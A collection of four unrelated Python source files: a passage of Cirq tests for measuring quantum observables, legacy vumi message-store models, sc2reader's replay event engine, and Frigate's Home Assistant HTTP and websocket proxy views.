assert still_todo == [meas_spec]
assert reps == 3
# 3. After taking the final 3 shots
bsa.consume_results(np.zeros((reps, 3), dtype=np.uint8))
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
assert still_todo == []
assert reps == 0
def test_meas_spec_still_todo_bad_spec():
bsa, meas_spec = _set_up_meas_specs_for_testing()
class BadStopping(StoppingCriteria):
def more_repetitions(self, accumulator: BitstringAccumulator) -> int:
return -23
bad_stop = BadStopping()
with pytest.raises(ValueError, match='positive'):
_, _ = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=bad_stop,
)
def test_meas_spec_still_todo_too_many_params(monkeypatch):
monkeypatch.setattr(cw.observable_measurement, 'MAX_REPETITIONS_PER_JOB', 30_000)
bsa, meas_spec = _set_up_meas_specs_for_testing()
lots_of_meas_spec = [meas_spec] * 3_001
stop = cw.RepetitionsStoppingCriteria(10_000)
with pytest.raises(ValueError, match='too many parameter settings'):
_, _ = _check_meas_specs_still_todo(
meas_specs=lots_of_meas_spec,
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
def test_meas_spec_still_todo_lots_of_params(monkeypatch):
monkeypatch.setattr(cw.observable_measurement, 'MAX_REPETITIONS_PER_JOB', 30_000)
bsa, meas_spec = _set_up_meas_specs_for_testing()
lots_of_meas_spec = [meas_spec] * 4
stop = cw.RepetitionsStoppingCriteria(10_000)
with pytest.warns(UserWarning, match='will be throttled from 10000 to 7500'):
_, _ = _check_meas_specs_still_todo(
meas_specs=lots_of_meas_spec,
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
def test_checkpoint_options():
# There are three ~binary options (the latter two can be either specified or `None`. We
# test those 2^3 cases.
assert _parse_checkpoint_options(False, None, None) == (None, None)
with pytest.raises(ValueError):
_parse_checkpoint_options(False, 'test', None)
with pytest.raises(ValueError):
_parse_checkpoint_options(False, None, 'test')
with pytest.raises(ValueError):
_parse_checkpoint_options(False, 'test1', 'test2')
chk, chkprev = _parse_checkpoint_options(True, None, None)
assert chk.startswith(tempfile.gettempdir())
assert chk.endswith('observables.json')
assert chkprev.startswith(tempfile.gettempdir())
assert chkprev.endswith('observables.prev.json')
chk, chkprev = _parse_checkpoint_options(True, None, 'prev.json')
assert chk.startswith(tempfile.gettempdir())
assert chk.endswith('observables.json')
assert chkprev == 'prev.json'
chk, chkprev = _parse_checkpoint_options(True, 'my_fancy_observables.json', None)
assert chk == 'my_fancy_observables.json'
assert chkprev == 'my_fancy_observables.prev.json'
chk, chkprev = _parse_checkpoint_options(True, 'my_fancy/observables.json', None)
assert chk == 'my_fancy/observables.json'
assert chkprev == 'my_fancy/observables.prev.json'
with pytest.raises(ValueError, match=r'Please use a `.json` filename.*'):
_parse_checkpoint_options(True, 'my_fancy_observables.obs', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, 'my_fancy_observables', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, '.obs', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, 'obs.', None)
with pytest.raises(ValueError, match=r"pattern of 'filename.extension'.*"):
_parse_checkpoint_options(True, '', None)
chk, chkprev = _parse_checkpoint_options(True, 'test1', 'test2')
assert chk == 'test1'
assert chkprev == 'test2'
@pytest.mark.parametrize(('with_circuit_sweep', 'checkpoint'), [(True, True), (False, False)])
def test_measure_grouped_settings(with_circuit_sweep, checkpoint, tmpdir):
qubits = cirq.LineQubit.range(1)
(q,) = qubits
tests = [
(cirq.KET_ZERO, cirq.Z, 1),
(cirq.KET_ONE, cirq.Z, -1),
(cirq.KET_PLUS, cirq.X, 1),
(cirq.KET_MINUS, cirq.X, -1),
(cirq.KET_IMAG, cirq.Y, 1),
(cirq.KET_MINUS_IMAG, cirq.Y, -1),
]
if with_circuit_sweep:
ss = cirq.Linspace('a', 0, 1, 12)
else:
ss = None
if checkpoint:
checkpoint_fn = f'{tmpdir}/obs.json'
else:
checkpoint_fn = None
for init, obs, coef in tests:
setting = cw.InitObsSetting(
init_state=init(q),
observable=obs(q),
)
grouped_settings = {setting: [setting]}
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
results = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
circuit_sweep=ss,
checkpoint=CheckpointFileOptions(checkpoint=checkpoint, checkpoint_fn=checkpoint_fn),
)
if with_circuit_sweep:
for result in results:
assert result.means() == [coef]
else:
(result,) = results # one group
assert result.means() == [coef]
def _get_some_grouped_settings():
qubits = cirq.LineQubit.range(2)
q0, q1 = qubits
terms = [
cirq.X(q0),
cirq.Y(q1),
]
settings = list(cirq.work.observables_to_settings(terms, qubits))
grouped_settings = cirq.work.group_settings_greedy(settings)
return grouped_settings, qubits
def test_measure_grouped_settings_calibration_validation():
dummy_ro_calib = _MockBitstringAccumulator()
grouped_settings, qubits = _get_some_grouped_settings()
with pytest.raises(
ValueError, match=r'Readout calibration only works if `readout_symmetrization` is enabled'
):
cw.measure_grouped_settings(
circuit=cirq.Circuit(cirq.I.on_each(*qubits)),
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(10_000),
readout_calibrations=dummy_ro_calib,
readout_symmetrization=False, # no-no!
)
def test_measure_grouped_settings_read_checkpoint(tmpdir):
qubits = cirq.LineQubit.range(1)
(q,) = qubits
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q),
observable=cirq.Z(q),
)
grouped_settings = {setting: [setting]}
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
with pytest.raises(ValueError, match=r'same filename.*'):
_ = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
checkpoint=CheckpointFileOptions(
checkpoint=True,
checkpoint_fn=f'{tmpdir}/obs.json',
checkpoint_other_fn=f'{tmpdir}/obs.json', # Same filename
),
)
_ = cw.measure_grouped_settings(
circuit=circuit,
grouped_settings=grouped_settings,
sampler=cirq.Simulator(),
stopping_criteria=cw.RepetitionsStoppingCriteria(1_000, repetitions_per_chunk=500),
checkpoint=CheckpointFileOptions(
checkpoint=True,
checkpoint_fn=f'{tmpdir}/obs.json',
checkpoint_other_fn=f'{tmpdir}/obs.prev.json',
),
)
results = cirq.read_json(f'{tmpdir}/obs.json')
(result,) = results # one group
assert result.n_repetitions == 1_000
assert result.means() == [1.0]
Q = cirq.NamedQubit('q')
@pytest.mark.parametrize(
['circuit', 'observable'],
[
(cirq.Circuit(cirq.X(Q) ** 0.2), cirq.Z(Q)),
(cirq.Circuit(cirq.X(Q) ** -0.5, cirq.Z(Q) ** 0.2), cirq.Y(Q)),
(cirq.Circuit(cirq.Y(Q) ** 0.5, cirq.Z(Q) ** 0.2), cirq.X(Q)),
],
)
def test_XYZ_point8(circuit, observable):
# each circuit, observable combination should result in the observable value of 0.8
df = measure_observables_df(
circuit,
[observable],
cirq.Simulator(seed=52),
stopping_criteria=VarianceStoppingCriteria(1e-3 ** 2),
)
assert len(df) == 1, 'one observable'
mean = df.loc[0]['mean']
np.testing.assert_allclose(0.8, mean, atol=1e-2)
def _each_in_its_own_group_grouper(
settings: Iterable[InitObsSetting],
) -> Dict[InitObsSetting, List[InitObsSetting]]:
return {setting: [setting] for setting in settings}
@pytest.mark.parametrize(
'grouper', ['greedy', group_settings_greedy, _each_in_its_own_group_grouper]
)
def test_measure_observable_grouper(grouper):
circuit = cirq.Circuit(cirq.X(Q) ** 0.2)
observables = [
cirq.Z(Q),
cirq.Z(cirq.NamedQubit('q2')),
]
results = measure_observables(
circuit,
observables,
cirq.Simulator(seed=52),
stopping_criteria=RepetitionsStoppingCriteria(50_000),
grouper=grouper,
)
assert len(results) == 2, 'two observables'
np.testing.assert_allclose(0.8, results[0].mean, atol=0.05)
np.testing.assert_allclose(1, results[1].mean, atol=1e-9)
def test_measure_observable_bad_grouper():
circuit = cirq.Circuit(cirq.X(Q) ** 0.2)
observables = [
cirq.Z(Q),
cirq.Z(cirq.NamedQubit('q2')),
]
with pytest.raises(ValueError, match=r'Unknown grouping function'):
_ = measure_observables(
circuit,
observables,
cirq.Simulator(seed=52),
stopping_criteria=RepetitionsStoppingCriteria(50_000),
grouper='super fancy grouper',
)
|
|
"""Previous versions of message store models."""
from calendar import timegm
from datetime import datetime
from vumi.message import (
TransportUserMessage, TransportEvent, format_vumi_date, parse_vumi_date)
from vumi.persist.model import Model
from vumi.persist.fields import (
VumiMessage, ForeignKey, ListOf, Dynamic, Tag, Unicode, ManyToMany)
from vumi_message_store.migrators import (
InboundMessageMigrator, OutboundMessageMigrator, EventMigrator)
class BatchVNone(Model):
bucket = 'batch'
# key is batch_id
tags = ListOf(Tag())
metadata = Dynamic(Unicode())
class OutboundMessageVNone(Model):
bucket = 'outboundmessage'
# key is message_id
msg = VumiMessage(TransportUserMessage)
batch = ForeignKey(BatchVNone, null=True)
class EventVNone(Model):
bucket = 'event'
# key is event_id
event = VumiMessage(TransportEvent)
message = ForeignKey(OutboundMessageVNone)
class InboundMessageVNone(Model):
bucket = 'inboundmessage'
# key is message_id
msg = VumiMessage(TransportUserMessage)
batch = ForeignKey(BatchVNone, null=True)
class OutboundMessageV1(Model):
bucket = 'outboundmessage'
VERSION = 1
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
class InboundMessageV1(Model):
bucket = 'inboundmessage'
VERSION = 1
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
class OutboundMessageV2(Model):
bucket = 'outboundmessage'
VERSION = 2
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
self.batches_with_timestamps = batches_with_timestamps
return super(OutboundMessageV2, self).save()
class InboundMessageV2(Model):
bucket = 'inboundmessage'
VERSION = 2
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
self.batches_with_timestamps = batches_with_timestamps
return super(InboundMessageV2, self).save()
class OutboundMessageV3(Model):
bucket = 'outboundmessage'
VERSION = 3
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
batches_with_addresses = []
timestamp = format_vumi_date(self.msg['timestamp'])
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['to_addr']))
self.batches_with_timestamps = batches_with_timestamps
self.batches_with_addresses = batches_with_addresses
return super(OutboundMessageV3, self).save()
class InboundMessageV3(Model):
bucket = 'inboundmessage'
VERSION = 3
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
batches_with_timestamps = []
batches_with_addresses = []
timestamp = self.msg['timestamp']
for batch_id in self.batches.keys():
batches_with_timestamps.append(u"%s$%s" % (batch_id, timestamp))
batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['from_addr']))
self.batches_with_timestamps = batches_with_timestamps
self.batches_with_addresses = batches_with_addresses
return super(InboundMessageV3, self).save()
class EventV1(Model):
bucket = 'event'
VERSION = 1
MIGRATOR = EventMigrator
# key is event_id
event = VumiMessage(TransportEvent)
message = ForeignKey(OutboundMessageV3)
# Extra fields for compound indexes
message_with_status = Unicode(index=True, null=True)
def save(self):
# We override this method to set our index fields before saving.
timestamp = self.event['timestamp']
status = self.event['event_type']
if status == "delivery_report":
status = "%s.%s" % (status, self.event['delivery_status'])
self.message_with_status = u"%s$%s$%s" % (
self.message.key, timestamp, status)
return super(EventV1, self).save()
def to_reverse_timestamp(vumi_timestamp):
"""
Turn a vumi_date-formatted string into a string that sorts in reverse order
and can be turned back into a timestamp later.
This is done by converting to a unix timestamp and subtracting it from
0xffffffffff (2**40 - 1) to get a number well outside the range
representable by the datetime module. The result is returned as a
hexadecimal string.
"""
timestamp = timegm(parse_vumi_date(vumi_timestamp).timetuple())
return "%X" % (0xffffffffff - timestamp)
def from_reverse_timestamp(reverse_timestamp):
"""
Turn a reverse timestamp string (from `to_reverse_timestamp()`) into a
vumi_date-formatted string.
"""
timestamp = 0xffffffffff - int(reverse_timestamp, 16)
return format_vumi_date(datetime.utcfromtimestamp(timestamp))
class OutboundMessageV4(Model):
bucket = 'outboundmessage'
VERSION = 4
MIGRATOR = OutboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
batches_with_addresses_reverse = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
self.batches_with_timestamps = []
self.batches_with_addresses = []
self.batches_with_addresses_reverse = []
timestamp = self.msg['timestamp']
if not isinstance(timestamp, basestring):
timestamp = format_vumi_date(timestamp)
reverse_ts = to_reverse_timestamp(timestamp)
for batch_id in self.batches.keys():
self.batches_with_timestamps.append(
u"%s$%s" % (batch_id, timestamp))
self.batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['to_addr']))
self.batches_with_addresses_reverse.append(
u"%s$%s$%s" % (batch_id, reverse_ts, self.msg['to_addr']))
return super(OutboundMessageV4, self).save()
class InboundMessageV4(Model):
bucket = 'inboundmessage'
VERSION = 4
MIGRATOR = InboundMessageMigrator
# key is message_id
msg = VumiMessage(TransportUserMessage)
batches = ManyToMany(BatchVNone)
# Extra fields for compound indexes
batches_with_timestamps = ListOf(Unicode(), index=True)
batches_with_addresses = ListOf(Unicode(), index=True)
batches_with_addresses_reverse = ListOf(Unicode(), index=True)
def save(self):
# We override this method to set our index fields before saving.
self.batches_with_timestamps = []
self.batches_with_addresses = []
self.batches_with_addresses_reverse = []
timestamp = self.msg['timestamp']
if not isinstance(timestamp, basestring):
timestamp = format_vumi_date(timestamp)
reverse_ts = to_reverse_timestamp(timestamp)
for batch_id in self.batches.keys():
self.batches_with_timestamps.append(
u"%s$%s" % (batch_id, timestamp))
self.batches_with_addresses.append(
u"%s$%s$%s" % (batch_id, timestamp, self.msg['from_addr']))
self.batches_with_addresses_reverse.append(
u"%s$%s$%s" % (batch_id, reverse_ts, self.msg['from_addr']))
return super(InboundMessageV4, self).save()
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals, division
import collections
from sc2reader.events import *
from sc2reader.engine.events import InitGameEvent, EndGameEvent, PluginExit
class GameEngine(object):
"""
GameEngine Specification
--------------------------
The game engine runs through all the events for a given replay in
chronological order. For each event, event handlers from registered
plugins are executed in order of plugin registration from most general
to most specific.
Example Usage::
class Plugin1():
def handleCommandEvent(self, event, replay):
pass
class Plugin2():
def handleEvent(self, event, replay):
pass
def handleTargetUnitCommandEvent(self, event, replay):
pass
...
engine = GameEngine(plugins=[Plugin1(), Plugin2()], **options)
engine.register_plugins(Plugin3(), Plugin(4))
engine.reigster_plugin(Plugin(5))
engine.run(replay)
Calls functions in the following order for a ``TargetUnitCommandEvent``::
Plugin1.handleCommandEvent(event, replay)
Plugin2.handleEvent(event, replay)
Plugin2.handleTargetUnitCommandEvent(event, replay)
Plugin Specification
-------------------------
Plugins can opt in to handle events with methods in the format:
def handleEventName(self, event, replay)
In addition to handling specific event types, plugins can also
handle events more generally by handling built-in parent classes
from the list below::
* handleEvent - called for every single event of all types
* handleMessageEvent - called for events in replay.message.events
* handleGameEvent - called for events in replay.game.events
* handleTrackerEvent - called for events in replay.tracker.events
* handleCommandEvent - called for all types of command events
* handleControlGroupEvent - called for all player control group events
Plugins may also handle optional ``InitGame`` and ``EndGame`` events generated
by the GameEngine before and after processing all the events:
* handleInitGame - is called prior to processing a new replay to provide
an opportunity for the plugin to clear internal state and set up any
replay state necessary.
* handleEndGame - is called after all events have been processed and
can be used to perform post processing on aggregated data or clean up
intermediate data caches.
Event handlers can choose to ``yield`` additional events which will be injected
into the event stream directly after the event currently being processed. This
feature allows for message passing between plugins. An ExpansionTracker plugin
could notify all other plugins of a new ExpansionEvent that they could opt to
process::
def handleUnitDoneEvent(self, event, replay):
if event.unit.name == 'Nexus':
yield ExpansionEvent(event.frame, event.unit)
....
If a plugin wishes to stop processing a replay it can yield a PluginExit event before returning::
def handleEvent(self, event, replay):
if len(replay.tracker_events) == 0:
yield PluginExit(self, code=0, details=dict(msg="tracker events required"))
return
...
def handleCommandEvent(self, event, replay):
try:
possibly_throwing_error()
catch Error as e:
logger.error(e)
yield PluginExit(self, code=0, details=dict(msg="Unexpected exception"))
The GameEngine will intercept this event and remove the plugin from the list of
active plugins for this replay. The exit code and details will be available from the
replay::
code, details = replay.plugins['MyPlugin']
If your plugin depends on another plugin, it is a good idea to implement handlePluginExit
and be alerted if the plugin that you require fails. This way you can exit gracefully. You
can also check to see if the plugin name is in ``replay.plugin_failures``::
if 'RequiredPlugin' in replay.plugin_failures:
code, details = replay.plugins['RequiredPlugin']
message = "RequiredPlugin failed with code: {0}. Cannot continue.".format(code)
yield PluginExit(self, code=1, details=dict(msg=message))
"""
def __init__(self, plugins=[]):
self._plugins = list()
self.register_plugins(*plugins)
def register_plugin(self, plugin):
self._plugins.append(plugin)
def register_plugins(self, *plugins):
for plugin in plugins:
self.register_plugin(plugin)
def plugins(self):
return self._plugins
def run(self, replay):
# A map of [event.name] => event handlers in plugin registration order
# ranked from most generic to most specific
handlers = dict()
# Create a local copy of the plugins list. As plugins exit we can
# remove them from this list and regenerate event handlers.
plugins = list(self._plugins)
# Create a dict for storing plugin exit codes and details.
replay.plugin_result = replay.plugins = dict()
# Create a list storing replay.plugins keys for failures.
replay.plugin_failures = list()
# Fill event event queue with the replay events, bookmarked by Init and End events.
event_queue = collections.deque()
event_queue.append(InitGameEvent())
event_queue.extend(replay.events)
event_queue.append(EndGameEvent())
# Work through the events in the queue, pushing newly emitted events to
# the front of the line for immediate processing.
while len(event_queue) > 0:
event = event_queue.popleft()
if event.name == "PluginExit":
# Remove the plugin and reset the handlers.
plugins.remove(event.plugin)
handlers.clear()
replay.plugin_result[event.plugin.name] = (event.code, event.details)
if event.code != 0:
replay.plugin_failures.append(event.plugin.name)
# If we haven't compiled a list of handlers for this event yet, do so!
if event.name not in handlers:
event_handlers = self._get_event_handlers(event, plugins)
handlers[event.name] = event_handlers
else:
event_handlers = handlers[event.name]
# Events have the option of yielding one or more additional events
# which get processed after the current event finishes. The new_events
# batch is constructed in reverse order because extendleft reverses
# the order again with a series of appendlefts.
new_events = collections.deque()
for event_handler in event_handlers:
try:
for new_event in event_handler(event, replay) or []:
if new_event.name == "PluginExit":
new_events.append(new_event)
break
else:
new_events.appendleft(new_event)
except Exception as e:
if event_handler.__self__.name in ["ContextLoader"]:
# Certain built in plugins should probably still cause total failure
raise # Maybe??
else:
new_event = PluginExit(
event_handler.__self__, code=1, details=dict(error=e)
)
new_events.append(new_event)
event_queue.extendleft(new_events)
# For any plugins that didn't yield a PluginExit event or throw unexpected exceptions,
# record a successful completion.
for plugin in plugins:
replay.plugin_result[plugin.name] = (0, dict())
def _get_event_handlers(self, event, plugins):
return sum(
[self._get_plugin_event_handlers(plugin, event) for plugin in plugins], []
)
def _get_plugin_event_handlers(self, plugin, event):
handlers = list()
if isinstance(event, Event) and hasattr(plugin, "handleEvent"):
handlers.append(getattr(plugin, "handleEvent", None))
if isinstance(event, MessageEvent) and hasattr(plugin, "handleMessageEvent"):
handlers.append(getattr(plugin, "handleMessageEvent", None))
if isinstance(event, GameEvent) and hasattr(plugin, "handleGameEvent"):
handlers.append(getattr(plugin, "handleGameEvent", None))
if isinstance(event, TrackerEvent) and hasattr(plugin, "handleTrackerEvent"):
handlers.append(getattr(plugin, "handleTrackerEvent", None))
if isinstance(event, CommandEvent) and hasattr(plugin, "handleCommandEvent"):
handlers.append(getattr(plugin, "handleCommandEvent", None))
if isinstance(event, ControlGroupEvent) and hasattr(
plugin, "handleControlGroupEvent"
):
handlers.append(getattr(plugin, "handleControlGroupEvent", None))
if hasattr(plugin, "handle" + event.name):
handlers.append(getattr(plugin, "handle" + event.name, None))
return handlers
|
|
"""Frigate HTTP views."""
from __future__ import annotations
import asyncio
from http import HTTPStatus
from ipaddress import ip_address
import logging
from typing import Any, Optional, cast
import aiohttp
from aiohttp import hdrs, web
from aiohttp.web_exceptions import HTTPBadGateway, HTTPUnauthorized
import jwt
from multidict import CIMultiDict
from yarl import URL
from custom_components.frigate.const import (
ATTR_CLIENT_ID,
ATTR_CONFIG,
ATTR_MQTT,
CONF_NOTIFICATION_PROXY_ENABLE,
DOMAIN,
)
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.http.auth import DATA_SIGN_SECRET, SIGN_QUERY_PARAM
from homeassistant.components.http.const import KEY_HASS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant
_LOGGER: logging.Logger = logging.getLogger(__name__)
def get_default_config_entry(hass: HomeAssistant) -> ConfigEntry | None:
"""Get the default Frigate config entry.
This is for backwards compatibility for when only a single instance was
supported. If there's more than one instance configured, then there is no
default and the user must specify explicitly which instance they want.
"""
frigate_entries = hass.config_entries.async_entries(DOMAIN)
if len(frigate_entries) == 1:
return frigate_entries[0]
return None
def get_frigate_instance_id(config: dict[str, Any]) -> str | None:
"""Get the Frigate instance id from a Frigate configuration."""
# Use the MQTT client_id as a way to separate the frigate instances, rather
# than just using the config_entry_id, in order to make URLs maximally
# relatable/findable by the user. The MQTT client_id value is configured by
# the user in their Frigate configuration and will be unique per Frigate
# instance (enforced in practice on the Frigate/MQTT side).
return cast(Optional[str], config.get(ATTR_MQTT, {}).get(ATTR_CLIENT_ID))
def get_config_entry_for_frigate_instance_id(
hass: HomeAssistant, frigate_instance_id: str
) -> ConfigEntry | None:
"""Get a ConfigEntry for a given frigate_instance_id."""
for config_entry in hass.config_entries.async_entries(DOMAIN):
config = hass.data[DOMAIN].get(config_entry.entry_id, {}).get(ATTR_CONFIG, {})
if config and get_frigate_instance_id(config) == frigate_instance_id:
return config_entry
return None
def get_frigate_instance_id_for_config_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
) -> ConfigEntry | None:
"""Get a frigate_instance_id for a ConfigEntry."""
config = hass.data[DOMAIN].get(config_entry.entry_id, {}).get(ATTR_CONFIG, {})
return get_frigate_instance_id(config) if config else None
# These proxies are inspired by:
# - https://github.com/home-assistant/supervisor/blob/main/supervisor/api/ingress.py
class ProxyView(HomeAssistantView): # type: ignore[misc]
"""HomeAssistant view."""
requires_auth = True
def __init__(self, websession: aiohttp.ClientSession):
"""Initialize the frigate clips proxy view."""
self._websession = websession
def _get_config_entry_for_request(
self, request: web.Request, frigate_instance_id: str | None
) -> ConfigEntry | None:
"""Get a ConfigEntry for a given request."""
hass = request.app[KEY_HASS]
if frigate_instance_id:
return get_config_entry_for_frigate_instance_id(hass, frigate_instance_id)
return get_default_config_entry(hass)
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
raise NotImplementedError # pragma: no cover
def _permit_request(self, request: web.Request, config_entry: ConfigEntry) -> bool:
"""Determine whether to permit a request."""
return True
async def get(
self,
request: web.Request,
**kwargs: Any,
) -> web.Response | web.StreamResponse | web.WebSocketResponse:
"""Route data to service."""
try:
return await self._handle_request(request, **kwargs)
except aiohttp.ClientError as err:
_LOGGER.debug("Reverse proxy error for %s: %s", request.rel_url, err)
raise HTTPBadGateway() from None
async def _handle_request(
self,
request: web.Request,
frigate_instance_id: str | None = None,
**kwargs: Any,
) -> web.Response | web.StreamResponse:
"""Handle route for request."""
config_entry = self._get_config_entry_for_request(request, frigate_instance_id)
if not config_entry:
return web.Response(status=HTTPStatus.BAD_REQUEST)
if not self._permit_request(request, config_entry):
return web.Response(status=HTTPStatus.FORBIDDEN)
full_path = self._create_path(**kwargs)
if not full_path:
return web.Response(status=HTTPStatus.NOT_FOUND)
url = str(URL(config_entry.data[CONF_URL]) / full_path)
data = await request.read()
source_header = _init_header(request)
async with self._websession.request(
request.method,
url,
headers=source_header,
params=request.query,
allow_redirects=False,
data=data,
) as result:
headers = _response_header(result)
# Stream response
response = web.StreamResponse(status=result.status, headers=headers)
response.content_type = result.content_type
try:
await response.prepare(request)
async for data in result.content.iter_chunked(4096):
await response.write(data)
except (aiohttp.ClientError, aiohttp.ClientPayloadError) as err:
_LOGGER.debug("Stream error for %s: %s", request.rel_url, err)
except ConnectionResetError:
# Connection is reset/closed by peer.
pass
return response
class SnapshotsProxyView(ProxyView):
"""A proxy for snapshots."""
url = "/api/frigate/{frigate_instance_id:.+}/snapshot/{eventid:.*}"
extra_urls = ["/api/frigate/snapshot/{eventid:.*}"]
name = "api:frigate:snapshots"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"api/events/{kwargs['eventid']}/snapshot.jpg"
class NotificationsProxyView(ProxyView):
"""A proxy for notifications."""
url = "/api/frigate/{frigate_instance_id:.+}/notifications/{event_id}/{path:.*}"
extra_urls = ["/api/frigate/notifications/{event_id}/{path:.*}"]
name = "api:frigate:notification"
requires_auth = False
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
path, event_id = kwargs["path"], kwargs["event_id"]
if path == "thumbnail.jpg":
return f"api/events/{event_id}/thumbnail.jpg"
if path == "snapshot.jpg":
return f"api/events/{event_id}/snapshot.jpg"
if path.endswith("clip.mp4"):
return f"api/events/{event_id}/clip.mp4"
return None
def _permit_request(self, request: web.Request, config_entry: ConfigEntry) -> bool:
"""Determine whether to permit a request."""
return bool(config_entry.options.get(CONF_NOTIFICATION_PROXY_ENABLE, True))
class VodProxyView(ProxyView):
"""A proxy for vod playlists."""
url = "/api/frigate/{frigate_instance_id:.+}/vod/{path:.+}/{manifest:.+}.m3u8"
extra_urls = ["/api/frigate/vod/{path:.+}/{manifest:.+}.m3u8"]
name = "api:frigate:vod:mainfest"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"vod/{kwargs['path']}/{kwargs['manifest']}.m3u8"
class VodSegmentProxyView(ProxyView):
"""A proxy for vod segments."""
url = "/api/frigate/{frigate_instance_id:.+}/vod/{path:.+}/{segment:.+}.ts"
extra_urls = ["/api/frigate/vod/{path:.+}/{segment:.+}.ts"]
name = "api:frigate:vod:segment"
requires_auth = False
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"vod/{kwargs['path']}/{kwargs['segment']}.ts"
async def _async_validate_signed_manifest(self, request: web.Request) -> bool:
"""Validate the signature for the manifest of this segment."""
hass = request.app[KEY_HASS]
secret = hass.data.get(DATA_SIGN_SECRET)
signature = request.query.get(SIGN_QUERY_PARAM)
if signature is None:
_LOGGER.warning("Missing authSig query parameter on VOD segment request.")
return False
try:
claims = jwt.decode(
signature, secret, algorithms=["HS256"], options={"verify_iss": False}
)
except jwt.InvalidTokenError:
_LOGGER.warning("Invalid JWT token for VOD segment request.")
return False
# Check that the base path is the same as what was signed
check_path = request.path.rsplit("/", maxsplit=1)[0]
if not claims["path"].startswith(check_path):
_LOGGER.warning("%s does not start with %s", claims["path"], check_path)
return False
return True
async def get(
self,
request: web.Request,
**kwargs: Any,
) -> web.Response | web.StreamResponse | web.WebSocketResponse:
"""Route data to service."""
if not await self._async_validate_signed_manifest(request):
raise HTTPUnauthorized()
return await super().get(request, **kwargs)
class WebsocketProxyView(ProxyView):
"""A simple proxy for websockets."""
async def _proxy_msgs(
self,
ws_in: aiohttp.ClientWebSocketResponse | web.WebSocketResponse,
ws_out: aiohttp.ClientWebSocketResponse | web.WebSocketResponse,
) -> None:
async for msg in ws_in:
try:
if msg.type == aiohttp.WSMsgType.TEXT:
await ws_out.send_str(msg.data)
elif msg.type == aiohttp.WSMsgType.BINARY:
await ws_out.send_bytes(msg.data)
elif msg.type == aiohttp.WSMsgType.PING:
await ws_out.ping()
elif msg.type == aiohttp.WSMsgType.PONG:
await ws_out.pong()
except ConnectionResetError:
return
async def _handle_request(
self,
request: web.Request,
frigate_instance_id: str | None = None,
**kwargs: Any,
) -> web.Response | web.StreamResponse:
"""Handle route for request."""
config_entry = self._get_config_entry_for_request(request, frigate_instance_id)
if not config_entry:
return web.Response(status=HTTPStatus.BAD_REQUEST)
if not self._permit_request(request, config_entry):
return web.Response(status=HTTPStatus.FORBIDDEN)
